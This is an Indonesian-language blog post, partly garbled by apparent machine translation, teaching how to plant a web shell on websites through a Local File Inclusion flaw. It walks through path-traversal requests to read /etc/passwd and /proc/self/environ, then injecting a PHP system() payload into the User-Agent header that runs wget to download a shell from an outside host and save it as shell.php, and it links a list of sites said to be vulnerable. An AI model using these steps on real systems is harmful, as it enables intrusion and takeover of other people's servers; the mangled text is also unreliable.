Langsung aja yah:(: Sedikit tambahan)Daftar situs inisial Yg Vuln LFI: http://pastebin.com/wBsMqh5P
1 :: Intro2 :: Menemukan LFI3 :: Memeriksa apakah proc / self / environ dapat diakses4 :: Penyuntikan kode berbahaya5 :: Akses shell kami
/ 1. Intro ::
Dalam
serikat ini saya akan menunjukkan kepada Anda bagaimana untuk
menempatkan shell di website menggunakan "File Inclusion lokal"
kerentanan dan injeksi kode berbahaya di 'pro / self / environ'
/ 2. :: Pencari LFI
Sekarang saya akan menunjukkan cara untuk menemukan situs Local File Inclusion rentan. Ini akan membantu kita menemukan adalah target lebih cepat.
http://www.targetsite.com/view.php?page=contact.php
- Sekarang kita akan menggantikan "contact.php" dengan ".. /" sehingga URL akan menjadi
http://www.targetsite.com/view.php?page=../
dan kami punya kesalahan
Warning:
include (.. /) [function.include]: failed to open stream: Tidak ada
berkas atau direktori di / home / sirgod / public_html / targetsite.com /
view.php on line 1.337
peluang besar untuk memiliki sebuah file lokal Inklusi vulnerability.Let 's pergi ke langkah berikutnya.
- Sekarang kita memeriksa etc / passwd untuk melihat apakah itu adalah Local File Inclusion rentan. Sekarang cobalah membuat permintaan:
http://www.targetsite.com/view.php?page=../../../etc/passwd
kita mendapatkan kesalahan dan tidak ada etc / passwd
Warning:
include (.. /) [function.include]: failed to open stream: Tidak ada
berkas atau direktori di / home / sirgod / public_html / targetsite.com /
view.php on line 1.337
jadi kita akan pergi direktori lebih up
http://www.targetsite.com/view.php?page=../../../../../etc/passwd
kami telah berhasil termasuk etc / passwd.
root: x: 0:0: root :/ akar :/ bin / bash bin: x: 1:1: bin :/ bin :/ sbin / nologin daemon: x: 2:2: daemon :/ sbin :/ sbin / nologin
adm: x: 3:4: adm :/ var / adm :/ sbin / nologin lp: x: 4:7: lp :/ var /
spool / lpd :/ sbin / nologin sync: x: 05:00: sync sbin
:/ :/ bin / sync shutdown: x: 6:0: shutdown :/ sbin :/ sbin / shutdown
halt: x: 7:0: halt :/ sbin :/ sbin / halt mail: x: 8:12: surat
:/ var / spool / mail :/ sbin / nologin news: x: 9:13: news :/ etc /
news: uucp: x: 10:14: uucp :/ var / spool / uucp :/ sbin / nologin
Operator :
x: 11:00: Operator :/ :/ sbin akar / nologin games: x: 12:100: games :/
usr / games :/ sbin / nologin test: x: 13:30: test :/ var / test: / sbin / nologin ftp:x:14:50:FTP Pengguna :/ var / ftp :/ sbin / nologin nobody: x: 99:99: Nobody :/ :/ sbin / nologin
/ 3. :: Memeriksa apakah proc / self / environ dapat diakses
- Sekarang kita perlu melihat apakah proc / self / environ dapat diakses. Kami akan mengganti etc / passwd dengan proc / self / environ
www.targetsite.com/view.php?page=../../../../../proc/self/environ
Jika Anda akhirnya mendapatkan sesuatu seperti ini,
DOCUMENT_ROOT
= / home / sirgod / public_html GATEWAY_INTERFACE = CGI/1.1 HTTP_ACCEPT
= text / html, application / xml; q = 0,9, aplikasi / xhtml + xml,
image / png, image / jpeg, image / gif, image / x-xbitmap ,
* / *, q = 0,1 HTTP_COOKIE = PHPSESSID =
134cc7261b341231b9594844ac2ad7ac HTTP_HOST = www.website.com
HTTP_REFERER = http://www.website.com/index.php?view=../../../../ /
/ etc / passwd HTTP_USER_AGENT = Opera/9.80 (Windows NT 5.1; U; en)....
Presto/2.2.15 Version/10.00 PATH = / bin :/ usr / bin QUERY_STRING =
view = ..% 2F .. %
2F% 2F ..% 2F ..% 2F ..% .. 2Fproc% 2Fself% 2Fenviron REDIRECT_STATUS =
200 REMOTE_ADDR = 6x.1xx.4x.1xx REMOTE_PORT = 35.665 REQUEST_METHOD =
GET REQUEST_URI = / index.php? view =. 2F%.%
2F ..% 2F ..% 2F ..% 2F ..% .. 2Fproc% 2Fself% 2Fenviron
SCRIPT_FILENAME = / home / sirgod / public_html / index.php SCRIPT_NAME =
/ index.php SERVER_ADDR = 1xx.1xx .1
xx.6x SERVER_ADMIN = webmaster@website.com SERVER_NAME =
www.website.com SERVER_PORT = 80 SERVER_PROTOCOL = HTTP/1.0
SERVER_SIGNATURE =Apache/1.3.37
(Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV / 2 mod_auth_passthrough/2.1
mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server di
http://www.targetsite.com Port 80
Itu berarti lingkungan, proc / self / dapat diakses. Jika Anda mendapatkan halaman kosong, sebuah proc error / self / environ tidak dapat diakses atau OS adalah FreeBSD.
/ 4. :: Suntik kode berbahaya
- Sekarang kita akan menyuntikkan kode berbahaya kami dalam proc / self / environ. Alasan kita mampu melakukan hal ini, karena, kita dapat menyuntikkan kode kita di header HTTP user-Agen.
Gunakan Tamper Data untuk Addon Firefox untuk mengubah User-Agent. Mulai Tamper Data di Firefox dan meminta URL:
http://www.targetsite.com/view.php?page=../../../../../proc/self/environ
Pilih Tamper dan User-Agent diajukan menulis kode berikut:
<System ('wget http://www.sh3ll.org/egy.txt-O shell.php');??>
Kemudian menyerahkan permintaan tersebut.
Perintah
kami akan dieksekusi (akan men-download shell txt dari
http://www.sh3ll.org/egy.txt dan akan menyimpannya sebagai shell.php
dalamsitus
direktori) melalui sistem (), dan shell kita akan created.If tidak
bekerja, coba exec () karena sistem () dapat dinonaktifkan pada
webserver dari php.ini.
/ 5. :: Akses shell kami
- Sekarang mari kita memeriksa apakah kode berbahaya ini kami berhasil injected.Lets memeriksa apakah shell hadir.
http://www.targetsite.com/shell.php
Dan Taraaaa shell kamu sukses tertanam!
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment